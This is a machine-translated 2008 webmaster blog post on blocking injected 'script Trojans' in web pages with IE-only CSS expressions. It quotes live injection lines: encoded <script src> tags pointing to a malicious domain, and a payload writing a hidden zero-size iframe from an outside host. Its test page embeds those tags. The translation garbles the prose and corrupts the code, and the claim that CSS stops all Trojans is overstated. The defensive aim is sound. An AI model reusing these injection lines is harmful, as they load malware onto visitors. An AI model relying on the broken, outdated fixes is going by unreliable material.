Tips for solving all web Trojans

Tips for solving all Web Trojans 2008-03-29 00:40:32 Source: Blue Ideal Vickeychen

or hanging horse problem, this time, I gradually feel the pressure, head big, through QQ or MSN Add me more and more people, I recently my own work is very busy. Hey, think about it, still have time to come to help everyone.

Not long ago, "a line of code to solve the IFRAME hanging horse (including server-side injection, client ARP injection, etc.)" has been recognized by many friends, this is indeed a good way to avoid the wind and rain. can now hang network horse Way really as I expected to change, now popular hanging <script> Trojan, sweat, and see a few netizens website have been so--the top or bottom of the page added: Web teaching Network

Note that the following address contains Trojans, please do not easily access:

<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>
<script src=http://%76%63%63%64%2e%63%6e></script>

Khan died, inserting n identical <script> marks in a row. My computer What patches are played, direct access to this http://%76%63%63%64%2E%63%6E (or direct use of thunder download), the amount ~ the screen:

document.write ("<div style= ' Display:none ' >")
document.write ("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>")
document.write ("</div>")

and use Thunder download http://a.158dm.com/b1.htm This file, a look, messy JS code, sweat, but found a similar QQ number, direct Gaga see, Khan, and then is a professional to provide network horse organization, Hey, what the worlds. Also the price is very high drop it!

...
var kfqq, qqs= "[Color=magenta]784378237[/color]"; Qwfgsg= "LLLL\\XXXXXLD"; KFQQ = Qqs;
(... (There are also n statistics of JS code)

For the above situation, I can not look at the white no matter, think of ways to do it, brother. Drink a bowl of mung bean porridge, sugar put quite a lot of, good drink. Way to think of. A little analysis gives the answer. Let's see what the characteristics of the,<script> Trojan are:

<script src=http://%76%63%63%64%2e%63%6e></script>

Yes, the script Trojan is generally a different src, that is, SRC is the beginning of the HTTP, if it is their own web site script is generally not add HTTP, and then look at the prototype of the Trojan, the output of the IFRAME, JS code or other <object> Code, no matter how much, how many to kill.

To write CSS with me, one by one, I wrote 5 different scenarios, and we have to test the HA:

Solution 1:

Iframe{n1ifm:expression (this.src= ' About:blank ', this.outerhtml= ');} /* This line of code is to solve the hanging iframe Trojan Oh * *
Script{nojs1:expression ((This.src.toLowerCase (). IndexOf (' http ') ==0)? document.write (' Trojan is successfully quarantined! '): ');} webjx.com

Principle: The <script> mark Src taken out to lowercase, and then see is not the "HTTP" beginning of the Alien JS script file, if it is, then the content of the page empty and write "Trojan was successfully quarantined!". otherwise normal display. webjx.com

Cons: Visitors will not be able to see the infected <script> Trojan pages.

Solution 2:

Iframe{nifm2:expression (this.src= ' About:blank ', this.outerhtml= ');}
Script{no2js:expression ((This.src.toLowerCase (). IndexOf (' http ') ==0)? Document.close (): ');}

Principle: The document.write () of the JS file of the other is forced to close using Document.close (). Trojan content has not yet finished writing, only partially forced cache output, the rest will not be written.

Solution 3:

Iframe{ni3fm:expression (this.src= ' About:blank ', this.outerhtml= ');}
Script{n3ojs:expression ((This.src.toLowerCase (). IndexOf (' http ') ==0)? Document.execcommand (' Stop '): ');}

Principle: The same to the other other JS file, immediately call IE private ExecCommand method to stop all page requests, so the next thing JS file is also forced to stop the download. Just like we clicked the "Stop" button on the browser. It seems that this is a method of JS analog IE stop button. Web Teaching Network

Solution 4:

Iframe{nif4m:expression (this.src= ' About:blank ', this.outerhtml= ');}
Script{noj4s:expression (if (this.src.indexOf (' http ') ==0) this.src= ' res://ieframe.dll/dnserror.htm ');}

Principle: The source of the JS file in the other section of the SRC rewrite cost to IE404 the address of the error page, so that the other JS code will not be downloaded.

Solution 5:

Iframe{nifm5:expression (this.src= ' About:blank ', this.outerhtml= ');}
Script{noj5s:expression ((This.id.toLowerCase (). IndexOf (' LH ') ==0)? document.write (' Trojan is successfully quarantined! '): ');}

The fifth scenario of the page HTML source code <script> to include the "LH" prefix of the ID, such as lhweatherjsapi,<script src= "***/**.js" id= "Lhsearchjsapi" > </script>

The following page code contains a Trojan address, and the Trojan in the page repeated 6 times, we use the above different programs to test, see how my research! (This test has a certain risk, please make sure to hit all the patches and re-test) Web teaching Network

<! DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 transitional//en" "Http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd
<meta http-equiv= "Content-type" Content= "text/html; Charset=utf-8 "/>
<title> CSS code </TITLE> to let JS Trojan process quickly abort;
<style type=" Text/css "id=
/*<![ cdata[*/
Iframe{nhk1:expression (this.src= ' About:blank ', this.outerhtml= ');}
Script{ngz1:expression ((this.src.indexOf (' http ') ==0)? Document.close (): ');}
/* Please pay attention to the latest Trojan handling methods: http://www.nihaoku.cn/ff/api.htm */
/*]]>*/
</style>
<body>
<script type= "Text/javascript" src= "1.js" ></SCRIPT>
<script src=http://%76%63% 63%64%2e%63%6e></script>
<script src= "Http://%76%63%63%64%2E%63%6E" type= "Text/javascript" > </script>

<script src=http://%76%63%63%64%2e%63%6e></script>
I am the 1 of the page itself
<script src=http://%76%63%63%64%2e%63%6e></script>
I am the 2 of the page itself
<script src=http://%76%63%63%64%2e%63%6e></script>
I am the 3 of the page itself
<script src=http://%76%63%63%64%2e%63%6e></script>
</body>

of which 1.js is their own site:

document.write ("I am the JS file on this site");
document.write ("

My test environment is:

Windows XP SP2 and Windows Vista SP1
Ie6/ie7/ie8
All the patches have been patched.

To sum up, all the current way of hanging horse all cracked, with CSS can solve all the Trojan problem, visitors will not be easily poisoned.

We also have to study carefully, to see what bugs my code, some words must be taken out to discuss, to solve the problem! Or you have other better ways to talk about it.

Tips for solving all web Trojans